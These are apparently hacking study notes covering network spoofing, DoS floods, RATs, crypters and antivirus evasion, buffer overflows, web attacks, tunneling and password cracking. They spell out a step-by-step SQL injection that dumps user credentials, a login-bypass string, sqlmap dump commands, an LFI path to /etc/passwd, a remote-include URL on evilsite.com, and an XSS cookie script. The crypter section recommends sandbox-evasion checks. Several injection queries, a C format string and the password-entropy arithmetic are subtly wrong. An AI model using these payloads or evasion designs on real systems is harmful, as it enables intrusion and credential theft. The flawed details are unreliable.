DNS Spoofing – The tactic of making a malicious zone transfer to make a false IP-URL match-up. This is done to send a target to a malicious website or DoS. EX: Google.com = attackers IP

1. Run ettercap with a unified sniffer

2. Turn on DNS spoof plugin

3. APR

4. Start sniffer

SSLStrip

SSLStrip is a python script which, when run in conjunction with an ARP attack, abuses a technique used by many website hosts where, when someone types in a URL it uses a 302 redirect or uses an SSL element embeded on the page to move the user to HTTPS. SSLStrip will strip the HTTP out of 302 requests and pages served through HTTP.

OS Vulnerabilities

All OS have all vulnerabilities. It is a common misconception that Windows is the only OS with holes.

Exploit – A malicious piece of code which can compromise a systems security and give an attacker access to that computer. They are used to penetrate and ultimately gain access to a system. They have a broad range of payloads and can do just about anything.

Common vulnerabilities

• Application Vulnerabilities

• TCP Stack Overflows

• Default permissions

• Default security settings

The most popular, successful, and common attacks are in default services, software, or processes that run on the computer. This is because the software is preinstalled and usually running by default. However, there are holes in all software and they can be taken advantage of.

Vulnerability Assessment

Vulnerabilities are security flaws in software. The are caused by poorly written code and a lack of testing. Patches fix holes. Unpatched systems are more vulnerable so you should always update all software.

Vulnerability scanners

• Nessus

• Nikito

Security Websites

• Bugtraq

• CVE Sites

• Milw0rm

• exploit-db

Web Server Vulnerabilities

Web servers are extremely vulnerable because of many reasons.

• Permanent connection to Internet

• Most likely firewalled

• Easier to exploit due to poor security.

Common vulnerabilities

• Passwords stored in plain-text or code

• Ability to traverse directories without getting 503.

• Ability to execute scripts

• Ability to bypass URL Checking and return a command prompt

• Improperly patched and configured servers.

Database Vulnerabilities

All DB systems have holes. Database servers may be local or remote. Might be behind a fire wall or DMZ.

Common vulnerabilities

• Misconfigured permissions

• bad database objects

• SQL injection

• Default DB passwords

• Null accounts/null sa account

• Vulnerable to the application they serve

• If application is poorly written it can allow for a compromise

TCP Stack Vulnerabilities

All OSs have this vulnerability. It is usually exploited for DoS attacks. It can be used to get in deeper into a network.

Common Vulnerabilities

• TCP Sequence Prediction (Session jacking)

• TCP Window Size Overflow

• Syn Flood

• APR

• DNS Poisoning (DNS Zone Transfers)

• High Volume Attacks (Ping of Death, Smurf, Teardrop, Botnets)

Smurf – Pinging a system with a broadcast address to get the target to send DoS other computers.

Teardrop – Sending malformed packets with bad IP fragments which causes an overflow on the TCP stack and cause a DoS.

Application Vulnerabilities

These vulnerabilities affect almost all software. They usually stem from poor coding practices.

Common Vulnerabilities

• Buffer Overflows

• Weak Authentication

• Poor Data Validation

• Written with errors/poor error checking

Denial of Service

Theory

The idea is to force a victim to use so much RAM that the computer slows to a halt, crashes, and goes offline. DoS attacks have become very mainstream as they often require little technical knowledge and tools are widely available.

Flood Attacks

Flood attacks are a form of DoS attack that attempts to bring a system down by flooding it with connections. This works because for every connection one makes, the computer must open up a slot in RAM for the connection. As a result, the computer can become bogged down until it crashes or, stops serving new connections.

Syn Flood

This abuses an issue in the TCP 3-way handshake, that can be exploited by an attacker to down a service. This happens when an attacker(s) sends many SYN requests to a server but, never replies to them. The server will wait until a time-out on the connection is reached, keeping a slot of RAM occupied for a specified amount of time. The attacker(s) must open enough slots in memory before their requests start timing out or, the attack will fail.

Mitigation for SYN Floods

The best way to deal with SYN floods is SYN cookies. SYN cookies work by sending the appropriate SYN/ACK response but, discards the SYN packet it received, ensuring SYN floods fail. This is because SYN floods rely on servers keeping the SYN packet for a specified period of time, so they can fill up the queue.

Firewalls can also easily detect flood attacks as, most have built in rules about the maximum connections one address is allowed to have.

UDP Flood

This abuses a flaw in UDP statless connections where, when no service is listening on a port, it replies with a ICMP unreachable. As a result, an attacker must only send large a large number of UDP packets to different ports that are closed. As a result, the server will respond with a large number of ICMP packets, causing the system to eventually become offline.

Mitigation for UDP Floods

Firewalls should be installed to filter out non-open ports, causing the UDP flood to fail as the UDP packets never reach the intended host.

ICMP Flood

This attack involves sending massive amounts of ping packets to a host, forcing a reply. The idea is similar to the previous flood attacks as, the system must open a slot of RAM to deal with the ping.

Mitigation for ICMP Floods

ICMP floods are easily stopped by firewalls. Most firewalls have automatic ICMP flood detection systems built in.

Smurf Attack

Smurf attacks involve spoofing source IP address to get a system to flood another system. The system who receives the spoofed packet believes the supplied source address is the one that sent it. As a result, this causes the system to respond to the source address. If spammed with said spoofed packet the server will, in turn, spam the victim.

Mitigation for Smurf Attacks

Simple firewall rules should stop this kind of attack.

Ping Of Death

This attack involves sending malformed ping packets in an attempt to cause a crash on the victim. The crash can be either the TCP stack or the system itself.

These attacks don't work much any more. They only tend to work on much older systems.

Teardrop

This attack involves sending mangled IP fragments in an attempt to cause a crash on the system. These attacks don't work much either.

However, the last documented case was in 2009 and for Windows Vista and 7. It had to do with SMB not handling IP fragments properly.

LOIC

Low Orbit Ion Cannon or LOIC is a popular tool for flood attacks. This tool has the ability to send TCP, UDP and ICMP floods at a specified host.

LOIC has been used heavily by the group Anonymous, and has helped down many unsavory sites like RIAA and MPAA.

SSL DoS

This attack has been known about since 2003 and is a flaw regarding SSL's renegotiation feature. This allows an attacker to down a server completely from just one connection rather than many like in traditional flood attacks.

The hack was first made public by the THC Team.

Exploits

Exploit - A malicious piece of code meant to compromise a system.

Compiling

Some exploits need to be compiled before use. This is because one exploit might not fit every system. You usually must edit the code and then compile it.

For C and C++ you must use the gcc compiler.

• gcc -o <app> <file>

This will compile the code under the application name <app>.

For python, Perl, Ruby, and other scripting languages.

• chmod +x <file>

To find useful exploits cat and grep /pentest/exploits/exploitdb/files.csv

Warning! Some exploits may be unreliable.

Resources

Exploit code site

• ~~milw0rm.com~~ ← Down

• exploit-db.com

Remote Administration Tools

Theory

Remote Administration Tools or RATs allow an attacker to take complete control of a remote computer, often allowing them to spy and infect other users on a network. The goal of these tools is to make it easy for an attacker to administrate many bots, and also, formulate attacks against other targets using these bots.

Uses

Many free and commercial RATs are available for download. They often allow an attacker to keylog, steal passwords, perform flood attacks, and even remotely view the users screen and webcam. Attacker often route their internet connections through infected hosts when attacking servers to ensure anonymity.

Darkcomet

CyberGate

Solitude

Cerberus

Blackshades

Metasploit

Metasploit is a open source exploitation framework used to simply and easily write exploit code for applications. It is written in Ruby and extremely powerful. It has many great features which make it a great addition to any pen-testers library

msfconsole

This program opens an interactive console for Metasploit.

• msfconsole

This lets us pass commands to Metasploit in an interactive environment.

From here we can type commands directly to MSF.

msfcli

msfweb

msfgui

Updating Metasploit

Exploitation

Payloads

Meterpreter

Encoders

Auxiliary

Credential Collection

db_autopwn

Browser Autopwn

Anti-virus Bypass

Theory

Anti-virus bypassing is any sort of program that attempts to bypass and ant-virus to get a malicious program on a machine. This often times is done by using code obscurification techniques to hide the malicious code.

Droppers

Droppers are programs that contain no malicious code but, go out to the internet and download and execute a malicious program.

Theory

Droppers are a semi competent threat, despite being picked up by anti-viruses most of the time.

However, the age old rule applies that, the longer a dropper has been around, the more susceptible it is to being caught. Newer droppers might not have this problem.

They are dangerous because an anti-virus can't keep tabs on everything running on a computer in real-time. Abusing this, a dropper downloads a program inconspicuously and then loads it into memory without a users consent.

Crypters

Crypters are programs designated to encrypt an executable so an anti-virus may not pick it up.

Theory

Crypters work by encrypting an executable using any number of methods and then, affixing a program, called a stub, to the front of it to decrypt the code. This allows us to have better control over the conditions our code runs in and, ensure undetection by way of hiding our executable in other processes.

The Encrypter

The encrypter works in this fashion:

1. Generate a stub source code file.

2. Compile the stub.

3. Place the stub at the beginning of a file.

4. Place a unique separator after the compiled stub.

5. Open a malicious executable.

6. Encrypt this executable.

7. Place the encrypted executable at the end of the file.

When the executable is run, the stub springs into action and decrypts and runs the code.

The Stub

A stub works like this:

1. Find the current directory of the process.

2. Open the executable.

3. Look for the unique separator.

4. Take only the encrypted executable and save it.

5. Decrypt the executable.

6. Inject the decrypted executable into a random process but, first, try to inject into explorer.

Antis

Antis are functions in a crypter that stop the executable from running if certain programs are running. For instance, a common “anti” is to stop the execution of the program if you are inside a VMWare virtual machine. Another is to not run if Sandboxie is running. Antis are generally a smart idea if you are afraid that your executable might come under inspection at some point.

Junk Code

Junk code is a technique used by malware authors to change the overall code of their program by adding segments of code that do not alter the program at all. A common junk code is to create an array and fill the array with random numbers, then read the numbers, then delete the array.

Buffer Overflows

This attack are one of the most commonly exploited attack according to OWASP. This attacks potency can range from a DoS attack to a full system compromise, making it a dangerous vulnerability to have present.

Theory

Buffer Overflow – An exploit that presents itself in C/C++ languages but, theoretically, can be exploited in any language that allows a program to commit data to memory without first checking the bounds of said data. A buffer overflow occurs when a program commits user input to memory without first checking the bounds of that data. When committed to the stack it causes a segmentation fault. This results in a crash under normal circumstances. However, in an attack, an attacker can overwrite the EIP register using the return value on the stack, allowing an attack to gain control of program flow. Depending on the severity of the exploit and the protections in place, exploiting it may be different under each circumstance.

Consider this code.

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

int main(int argc, char *argv[])

{

char buffer[8];

strcpy(buffer, argv[1]); //Moves 1^st arg into buffer

printf("buffer is %s%n", buffer);

printf("DONE!%n");

return 0;

}

This code creates a buffer which accepts 8 characters. However, there is no bounds checking done. As a result, an exploiter could input over 8 characters into the buffer and, have it still write to memory. This would overflow the buffer, and when written to stack will overflow into the stack causing a segmentation fault. This could possibly allow an attacker to take control of the program flow.

Protections

As a result of widespread exploitation, many protections have been developed to combat exploitation.

ASLR – Stands for Address Space Layout Randomization. This protection randomizes the top bit of program code, and the stack, making it harder for exploiters to reliably locate certain lauchpad commands. It's extremely popular and used in almost everything.

DEP – Stands for Data Execution Prevention. This comes in two forms, hardware and software, and is controlled by the /NX flag. The hardware version disables executable memory, stopping exploits from succeeding. A developer can still set certain memory areas as executable, in case they need to execute data from it. Software DEP is analogous to SafeSEH.

Stack Cookies – Controlled by the /GS flag. This puts a random 8 byte key before the saved EIP in the stack. Before a return is called, the program checks the key against on in the system. If they don't match up (meaning a overflow occurred and EIP is modified), it stops execution and terminates the program to prevent exploitation.

SafeSEH/SEHOP - A compiler option that sets a linked list of SEH pointers. If a SEH pointer doesn't match up with the list, it is not executed and the program is terminated.

NoSEH – This disables SEH, stopping exploits that rely on it.

Common Attacks

Despite the ample amount of protections, they aren't all fool-proof.

Launchpad – This technique is used to bypass ASLR. Due to the stacks address randomization, you can't directly jump EIP to the top of the stack, since the address won't be the same after reboot. Instead, you find a non-ASLR module and search for a JMP ESP command. Using this, you can jump to the top of the stack reliably.

SEH Overwrite – This takes advantage of SEH chains with no protections. You overwrite an SEH pointer with your own code, letting it go to a launchpad.

Egghunters – An egghunter is a piece of shellcode meant to rip through pages in memory looking for a specific pattern called an egg key,. This egg key is usually 8 bytes in length. Skape wrote a large paper on the subject, detailing different methods one could use to rip through memory without triggering exceptions.

Bypassing Stack Cookies – Stack cookies are a huge problem for exploiters as it is difficult to get around them. The easiest method is to overwrite the SEH chain and then trigger an exception before the check method is reached. This method is easily broken by SafeSEH or NoSEH.. The other way is to figure out a way to guess or calculate a stack cookie. Skape also wrote a piece on reducing the effective entropy of a stack cookie.

Problems

Bad Characters – Bad characters are bytes that have special meaning or, are specially filtered out or transmuted during an exploit. Common ones are 0x00, 0x0a, 0x0d. 0x00, for example, is a C++ string terminator and when used in an exploit, deletes everything past the 0x00 byte. 0x0a and 0x0d are carriage return and line feed characters.

Null Byte Addresses – Main program code (code contained within the executable itself) starts at 0x00??0000. As a result, one cannot use address from the main executable as the will contain a 0x00 byte.

Character Transmutation – This is a problem that happens when a buffer is first filtered or encoded before committing to a buffer. For instance, a program that might strip out any non-ASCII characters (00-7F). Anything higher will get transmuted. This also happens in UNICODE to ASCII translation as well.

Fuzzers

Fuzzer – A debugging program made to find buffer overflows by varying buffer size.

SPIKE - A well made fuzzing application. It has it's own scripting language.

Sfuzzer – A simple fuzzer meant to be a easier solution to SPIKE.

Fuzzing works by passing commands to a server with varying data sizes. If the program crashes during a fuzz, it is possibly vulnerable to a buffer overflow. For instance, take a program that accepts network data and then copies this data to the stack. A fuzzer will try A x 20 for the data. If that doesn't crash it, it will send A x 40, and so on and so forth. If the program does no bounds checking, it will eventually crash when the buffer size gets to big and overwrites EIP.

Web Based Attacks

Web based attacks are a very large set of attacks that can be performed on web applications. Often, these attacks involve a program not sanitizing user supplied data correctly.

Zero Frames and Zero Images

Zero frames and zero images are a form of obscurification, hiding HTML from the view of a webpage. Zero frames are created by setting an iframes width and height to zero or one, resulting in a webpage being rendered that a user cannot see. This is a common way for attackers to hide malicious code in legitimate webpages, infecting users without their knowledge.

Zero images work on the same principle but, instead, with an image. You can't render an entire webpage with it though. It is more commonly used to exploit cross site request forgery attacks.

Command Execution

Command execution takes advantage of unsanitized user input, which allows an attacker to inject commands directly into the server. This vulnerability usually takes advantage of a shell_exec() function in PHP.

Command execution techniques vary from OS to OS. Linux, for instance, with zero user input sanitation could be compromised with.

• [space]&[space][command]; [command];

However, be aware that in most scripts, you may have to satisfy certain requirements before the input will be passed along.

Cross Site Request Forgery

Cross Site Request Forgery or CSRF, is an attack that abuses authentication mechanisms that allow users to stay logged in even after the website is closed from the browser. CSRF allows an attacker to force a user to perform actions without their knowledge or consent. How it works is, an attacker makes a URL that links to an action performed on a site. For instance,

• http://www.vulnsite.com?password=”ichangedthis”&passwordconf=”ichangedthis”&submit=submit

This example, if opened by a authenticated user, would change their password to “ichangedthis”. If the links is opened directly, this would show the user the action was performed. A better way to do it is to wrap the URL in <img> tags to make a zero image. This would result in a hidden image that, when loaded, would cause the action to be performed without the users knowledge. You can also use a zero frame for this.

File Inclusion

These attacks revolve around files being included in PHP without restriction.

• http://vulnerablesite.com?page=include.php

This kind of attack contains two types of attacks, LFI (Local File Inclusion) and RFI (Remote File Inclusion).

Local

A LFI takes advantage of the ability for one to traverse directories locally, without interference, on the system. As a result certain files could be given to the attacker like, for instance, the /etc/passwd file on linux.

• http://vulnerablesite.com?page=/etc/passwd

Remote

A RFI takes advantage of being able to load other files into the include. This can be more dangerous, as it can allow an attacker to run commands using the shell_exec() function in PHP.

• http://vulnerablesite.com?page=http://evilsite.com/evil.php

SQL Injections

A form of attack meant to pass commands directly to an SQL server by using escape characters and malformed input. It can also be used to bypass authentication mechanisms by way of forcing a field to be true. It can also trick an SQL server into revealing database information.

URL

Say we have a site.

• www.vulnsite.com

This site loads a page called updates.php in which the URL passes parameters to.

• www.vulnsite.com/updates.php?id=1

Here we can pass parameters to the PHP application by changing the 1 in the URL to whatever we want. From here, we can begin testing to see if the site properly filters user input. It's easy to check this by passing the application a character that would raise an exception in the MySQL database. We can achieve this with a single quote ( ' ) character.

• www.vulnsite.com/updates.php?id=1'

We can tell if the application is vulnerable if an error is thrown.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

We can see that user input is not filtered properly and, as a result, we will be able to inject our own SQL statements.

First, we need to identify how many columns are in the table that controls the data on the page. We can do this by issuing commands tot he server via the URL, that will throw an error if a column does not exist. The ORDER BY statement will work for this.

• www.vulnsite.com/updates.php?id=1 ORDER BY 1;#

Alternatively, you can also use

• www.vulnsite.com/updates.php?id=1 ORDER BY 1--

This will most likely produce no errors, as the database will more than likely have more that one column. We slowly increase the amount until an error is thrown.

Unknown column '20' in 'order clause'

Once we get the error, we can infer that the table has one less than the page that threw the error, since it worked before the number was increased again.

Once we know this, we can begin injecting data directly into our page in attempt to find “vulnerable columns”. The goal is to find someplace on the page to display the data we will be collecting later. We do this with a UNION SELECT statement. We for the statement with as many columns as we found.

• www.vulnsite.com/updates.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8;#

Also note that we change the page id to one that is not likely to exist, -1. This allows us to easily identify vulnerable columns.

Upon doing this we can inspect the page and see some of the numbers in our UNION SELECT showed up on the page. These numbers represent our vulnerable columns. We can inject commands and use these vulnerable columns to render this data visible to us.

We can inject a variety of commands in here to better understand the back-end servers.

For this example, we will pretend 1,2 and, 3 are all vulnerable columns.

• www.vulnsite.com/updates.php?id=-1 UNION SELECT @@VERSION,USER(),DATABASE(),4,5,6,7,8;#

This will put the current database version number in column one, the current database user at column two and, the database name at column three.

Next we are going to want to get the table names from the information_schema. Please be wary of the version number, MYSQL 4 will not let you read from the information_schema without elevated privileges.

• www.vulnsite.com/updates.php?id=-1 group_concat(table_name),@@VERSION,DATABASE(),4,5,6,7,8 from information_schema where table_schema=database();#

This will stuff the table names, separated by commas, into a vulnerable column. This allows us to see all the tables that we may want to compromise. By using this, we can begin to enumerate the contents of the tables.

For this example, we will pretend that the tables listed were content, users, and admin.

• www.vulnsite.com/updates.php?id=-1 group_concat(column_name),2,3,4,5,6,7,8 from information_schema.columns where table_name=users;#

This will tell us all the column names for the table users. Once we get these, we can begin pulling out relevant information.

For this example, we will pretend the columns listed for users were, username, password, email, and id.

• www.vulnsite.com/updates.php?id=-1 group_concat(username,0x3a,password,0x3a,email,0x3a,id),2,3,4,5,6,7,8 from users;#

This prints all the table data to the screen and, separates each column with a colon (0x3a).

Here we have completed our attack and, accessed the previously hidden table data.

Authentication Bypass

This kind of attack is done by forging SQL queries that will always return true. This way we can bypass the login of a site, allowing us access, without a legitimate account.\

An example would be a site that takes both a username and a password.

Upon putting in a correct username and password, a user can get in. Upon putting in a wrong username and password, a person is denied access.

This is done through an SQL query similar to this.

• SELECT * FROM users WHERE username='$user' and password='$pass';

By escaping the quotes, we can authenticate ourselves without even knowing the password and sometimes, even the username.

A simple authentication bypass statement would look like this.

• User: admin Password: 1' OR '1' = '1';#

This would make the statement:

• SELECT * FROM users WHERE username='admin' and password='a' OR '1' = '1';#';

Since the end quote and semicolon are commented out, the statement's syntax is correct. Above that, we can see that the statement in the password section will always equal true, since 1 is always equal to itself.

Blind

SQLmap

SQLMap is a tool for automated SQLi attacks. This will automatically find and pull vulnerable columns, and also, display the data from the tables it enumerates.

First off we need to use SQLmap to get a list of the databases.

• ./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 –dbs

This will brute force the available databases, allowing us to continue with our next step, enumerating the tables.

• ./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 -D [database] –tables

Lastly, we can dump a tables contents using the dump option.

• ./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 =D [database] -T [table] –dump

Cross Site Scripting (XSS)

Cross site scripting or XSS allows an attacker to inject code into URLs or webpages. These attacks often lead to mass compromises, since the attacker can upload things like java drive bys into a reputable website. These attacks commonly are used to steal authentication cookies, allowing an attacker to impersonate a victim.

Non-Persistent

These attacks aren't as bad as a persistent attack but, can be just as damaging.

The attack involves abusing some form field or URL parameters that are not sanitized. This allows an attacker to craft a special URL that when the victim opens, will reflect attack code onto the webpage.

This kind of attack is the most popularly exploited.

It involves storing code in the URL parameters, allowing an attacker to give a specific URL to people and, when the follow it, it will render attack code on the page.

• www.vuln.com?updates.php?location=<p>EVIL CODE HERE!</p>

Persistent

Persistent XSS attacks allow an attacker to post client-side code directly into the webpage. This has obvious malicious implications as anyone who visits that site can become compromised.

For instance, imagine a website that takes a comment and posts it onto a webpage. An attacker could store HTML code into the comment, of proper character checking is not in place.

For example an attackers comment could be:

<P>EVIL COMMENT</P>

However, that is not malicious but, does allow us to test the problem. We can be more malicious with:

alert(document.cookie);

</Script>

This will display the current cookie for the domain.

In some cases the script tags can be filtered out by a script. However, script tags aren't the only dangerous thing.

This will run javascript if the link is hovered over. Other methods could be iframe or zero image attacks.

Web Based Exploitation Frameworks

OWASP Mantra

OWASP Mantra is a penetration testing minded browser which has many add-ons and tools built into it for testing web site vulnerabilities. It comes in two versions, Chromium (Windows only) and Firefox (Windows/Linux).

Port Tunneling

Port Tunneling – Redirecting network traffic to a port or proxy as to avoid detection, firewalls, or network blocks.

Theory

In the following example the attacker is in the cloud and the victim is behind a firewall that blocks all traffic in port X.

Tunneling works like so:

1. The attacker connects and sends data to the proxy on port X.

2. The proxy then forwards the data from port X to port Y.

3. The victim receives the data on port Y and send out a reply through Y.

4. The proxy forwards the data from port Y to port X.

5. The proxy sends the data through port X to the attacker.

In this example there is a middle man (The proxy) which redirects all the traffic. This helps the attack communicate with the victim because the firewall block all traffic on X but, not on Y.

This also can help to protect your anonymity.

HTTP CONNECT Tunneling

HTTP CONNECT has a wonderful feature where we can tunnel traffic over HTTP to a specific port. This uses a server as a proxy to reach the internet.

All we do is netcat into a HTTP CONNECT server and type the following:

• HTTP CONNECT [server]:[port} HTTP/1.0

SSL Tunneling

SSL Tunneling is a technique to add SSL functionality to programs or protocols that normally don't have SSL. This is useful when in an environment that might have certain SSL ports blocked or, you have a need to have a secure communication between protocols that have no encryption. However, the accepting party must have SSL enabled on their server or it will just drop the SSL traffic. This can be done by either setting SSL up for a specific protocol or, setting stunnel in server mode.

stunnel

stunnel – A free port forwarding tool. It is used as a wrapper to encrypt incoming and outgoing network traffic using SSL.

Stunnel also lets us bypass firewalls and IDSs since the traffic is encrypted and, we can send it through a legitimate SSL port such as 443.

Stunnel's configuration file is located in /etc/stunnel/stunnel.conf.

Once we have edited the configuration file, we can start stunnel using

• stunnel4

Be sure you have a certificate file and, it is pointed to in the stunnel configuration file.

SOCKS

SOCKS is a proxy server that allows all port traffic through, allowing for a more comprehensive sense of anonymity.

SSH Tunneling

SSH Tunneling – A tunneling protocol that connects to a computer using SSH and then redirects traffic from the SSH session to a port. Since the client is not only the client but, also the middleman, it makes things much faster.

Local

Local SSH port forwarding involves redirecting traffic from a port on the client and forwarding it through the SSH session to a local port on the ssh server.

• ssh -L [local-port]:localhost:[server-port] [host]

This will redirect 8080 on the client to the servers port 80.

Remote

Remote port forwarding allows you to connect to a server through another SSH server

• ssh -R [local-port]:localhost:[server-port] [host]

This would let the host connect to your port through the SSH tunnel by pointing his client to localhost:5900

Dynamic

This lets us forward all traffic through SOCKS and is a wonderful solution for complete network security.

• ssh -C -D [port] [host]

With this we can easily set up most clients to use the proxy settings and be allowed full anonymity.

Tor

Tor – A system of proxies acting as nodes to protect anonymity and information. All the data is encrypted over the tor and it provides good route security.

Theory

Tor works by not just using one proxy but, by using many in a route sequence. Tor uses a large amount if nodes. In every connection a random route is chosen, ensuring that anonymity is kept.

Installing

Using

Authentication Vulnerabilities

Theory

Authentication mechanisms are something that must be treated with the utmost security and cautiousness. However, some technologies still used today have extremely weak authentication systems in place. Often, some services send data completely in plain-text.

Problems With Networks

The big issue with networks is that someone can insert themselves in between a client and a server, allowing them to hear all traffic between them. Despite this there are secure ways of exchanging information even if a third party is listening.

Plain Text

This is the most vulnerable to attack. Usernames and passwords are sent in plain-text, allowing anyone to listen in. While this is the easiest to implement, this is the least secure.

FTP, POP, SMTP, and HTTP all use clear text systems.

Hashing Systems

Hashing systems involve encrypting a password one way. This means that I can turn a password into a hash but, I can't get a password back if I only have the hash. This adds a layer of security but, is a flawed methodology. Since the hash is as good as the password itself, it is considered just as good. As a result, one only needs to obtain the hash and they can compromise a user account.

SMB uses a hash system.

MD4

DES

MD5

SHA1

NTLM

MYSQL

Challenge Systems

Challenge systems take a better step in the right direction, however, can be flawed as we will see in the here be dragons section. Challenge systems build upon the hash system. When a computer comes to connect to a server, the server asks for the password and gives the client a challenge. This challenge can be any length but, for the sake of pacing, it will be only 4 characters longs. So the server gives the client the challenge 4444. The client then takes the password hash and one way encrypts it again, now using the challenge. The client sends the challenge/hash text back and the server compares the encrypted hashes. Challenges are randomly created at the time of connection.

Basically, the third party only gets the challenge and the encrypted hash. Since the encryption is one way, they can't do much with it. This also breaks most brute-force, dictionary,and rainbow table attacks as the client now has much more to do than just sending the password, he has to hash the password and then encrypt it using a challenge. This boosts the instruction amount, making it take much longer.

Common ways around this are to force a client to connect to you and send them the insecure challenge 1234. People have written tools and crackers based around this insecure hash and, as a result, one can often guess the password.

SMBv2 users a challenge response system.

Uneven Algorithms

Uneven algorithms are the hardest to break and, involve a high amount of security. This involves creating two sets of keys, a public and private key. The public key is given to the client while, the private key is kept for oneself. The public key is used to encrypt data, while, the private key is used to decrypt it.

The only thing the attacker can gain is the public key, which can only encrypt data, therefore being worthless to the attacker.

SSH uses uneven algorithms to encrypt data.

Here Be Dragons

This section is about mistakes made in the industry over the years but, mostly criticizes Micro$oft.

Back in 2008 Microsoft released a patch for a vulnerability called the SMB credential reflection attack. The attack was made popular by the Metasploit module made to leverage the vulnerability. Since SMB uses a hashing system, the hash is as good as the plain-text password. As a result, someone found that you could trick a computer into giving up the username and password hash of a victim. The attack worked by referencing a SMB share in a webpage by way of <IMG> tags. When the victim loaded up this webpage the computer attempted to access this share by first trying a user's name and password. All that was needed by the server is to reflect the information back and they would have access to the users account. A patch was eventually released.

Later in 2011, a person on exploit-db came forward with an attack aimed at SMBv2. This vulnerability leveraged an attack on the way SMBv2 handles challenges. The challenges weren't truly random and, as a result, an attacker could use this to gain access to the system.

How it works is, an attacker first attempts a connection to an SMB server. The server offers it a challenge, and then stores it. It then makes a new connection and gets a new challenge. It repeats this until it has around 8000 challenges. Then, the victim opens their web browser and is sent to a webpage with a refreshing javascript image linked to the servers SMB share. When the victim connects it offers it a challenge that it got previously. It does this until it collects all the challenge, encrypted has combinations. Then, the server connects back to the victim and keeps reconnecting until it gets a challenge it knows the answer to. It then replays the hash and gains access.

This was a huge mistake on Micro$oft's part as twice their default service has had huge gaping authentication holes that were leveraged in very similar ways.

The moral here is to figure out what the problem really is. The problem here wasn't necessarily the authentication system but, the fact that images could be linked to SMB shares in HTML. Microsoft could have easily disabled this as no-one uses this feature. Instead they beefed up security but, ultimately left this huge gaping hole and, they paid for it.

Password Attacks

Passwords are one of the weaker links in the security chain, and often times, we must add huge amounts of security to password systems to ensure there are protections for users. Most breaches are of those involving passwords, since humans will often use the same weak password for every account they own, allowing an attacker to breach all of their online accounts.

Theory

Password attacks often involve a form of password guessing, either online or offline. Some users can be easily profiled for their passwords, making this significantly easier. Others may have passwords that can't be profiled but, easily guessed or, compromised in a different fashion. Others might have secure passwords but, are still vulnerable to guessing attacks or, the password hash is easily available, allowing an offline attack. As a result, password systems can often be defeated if simple systems aren't put in place to mitigate attacks.

Strong Vs. Weak Passwords

Weak passwords often have many associated weaknesses that can make them easily guessed.

Weak passwords often times:

• are a single word

• less than 10 characters

• use only one character set (Ex: A-Z only)

These characteristics make them easily guessed and, dangerous.

A strong password usually has these characteristics:

• Multiple words

• more than 10 characters

• uses more than one character set (Ex: a-z,A-Z,1-9,symbols)

Some examples of weak and strong passwords.

Weak	Strong
easy	N0ts034sy!
weakpassword	5T0n9P4$$w0rD**

Brute Force

Brute-forcing is a password attack that guesses the password by starting at a base and adding one position to the password until it gets the right one. These attacks can take a while, especially when passwords have a high character count.

This attack can be done in both online and offline attacks. However, it is most suitable for online as, there are better and faster ways to get a password in an offline situation.

Ways to mitigate this is to either, make a large instruction set for sending the password, such as having to encrypt the password using a Caesar cypher according to the current server date. This ups the instruction count, making it take longer. Another way would be to implement a lockout of the service when a certain amount of tries are used. Linux handles this by making it so the hashes can only be compared every 5 seconds, so when a password is guessed wrong, they can't compare again until the time limit is up.

Dictionary

Dictionary attacks are done using a wordlist, which is a giant list of possible passwords. The attacker goes through each list and attempts to find a valid password. The wordlist can be any size, however, they often use only dictionary words and common passwords.

This attack can be done in both online and offline attacks. It is a suitable attack for both, however has a low yield, since the password might not be on the list.

You can mitigate this attack with most of the techniques in the brute-force section.

Rainbow Tables

Rainbow tables are an offline only attack that is considered the best solution for offline attacks. It involves creating a giant list of all the hash, plaintext password possible for a given set, such as characters a-z,A-Z,1-9,0,symbols up to characters 1-10. This could crack just about any password in our set, up to 10 characters.

Brute-force and dictionary attacks both cost a lot CPU wise, rainbow tables relieve some of the load but, take up a lot of space of disk. The table mentioned above would be roughly 250GB-500GB in size.

Rainbow tables take a long time to generate and, as a result, most are paid for. However, there is a group that makes them for free by using the community as a giant cluster.

GPU Cracking

This technique leverages Nvidia CUDA GPUs to do more work quicker.

Misconceptions

In all actuality, the guidelines I gave earlier for strong passwords are actually a little off. The truth is that the passwords I listed as “strong” passwords, aren't so strong but, in the scheme of things, can be OK for some applications.

Consider this character set which we will call the “Strong” Character Set (SCS):

a-z, A-Z, 1-0, symbols(!@#$%^&*()-+_=?)

The total amount of characters in the set:

a-z = 26

A-Z = 26

1-0 = 10

symbols = 15

Total: 77

Now consider a character set aptly named the “Weak” Character Set (WCS):

a-z,1-0

The total number of characters in the set

a-z = 26

1-0 = 10

Total: 36

First off, we will make a password fitting the guidelines of the first section and, follows along with the character set SCS, M0un741n5**.

First thing we should talk about the is the cons of this password. It's difficult to remember. It contains a huge character set and a lot of confusing symbols. In fact, I'm willing to make a bet the most people won't be able to remember if the o in password was a 0 or an o. However, lets take a look at how long it would take to crack the password containing these guidelines, brute-force style.

M0un741n5**

Chars: 11

Character set length: 77

Entropy of each character: We will assume 2

Total bits of entropy: ~28 (I made a pretty generous addition in it's favor)

Amount of guesses needed: 2²²

Time needed to crack: About 3.1 days at 1000 guesses a second.

Now lets make a password using WCS but, we will up the character count, allowing us to make a more secure password.

First, lets take a phrase and remove all the spaces, and then tack the number of words in it to the end, for this example it will be, thispasswordseemsunsecure4.

thispasswordseemsunsecure4

Chars: 26

Character set length: 36

Entropy of each character: We will assume 1.5

Total bits of entropy: ~54

Amount of guesses needed: 2⁵⁴

Time needed to crack: So long, I couldn't even calculate the time.

This password is easy to remember and, is hard for computers to guess.

XKCD made a joke about this in a comic, the punchline says, “Over the past 20 years, we've taught people to use passwords that would be hard for humans to remember and, easy for computers to guess.

hydra

xhydra

medusa

ncrack

Wireless Attacks

Theory

Wireless attacking has become extremely popular in the last couple of years due to it's extreme popularity and lax security standards. The biggest issue is that, unlike wired networks, it is easy to listen in on all communication that transpires between a client and an access point.

WEP

Wired Equivalent Privacy or WEP was the first wireless privacy standard to be released. In it's beginnings, many white hat researchers wrote papers detailing WEPs huge gaping flaws however, their security concerns were ultimately ignored. WEP still remains the most popular wireless security standard despite being hard to use, having cryptic keys, and is easily broken.

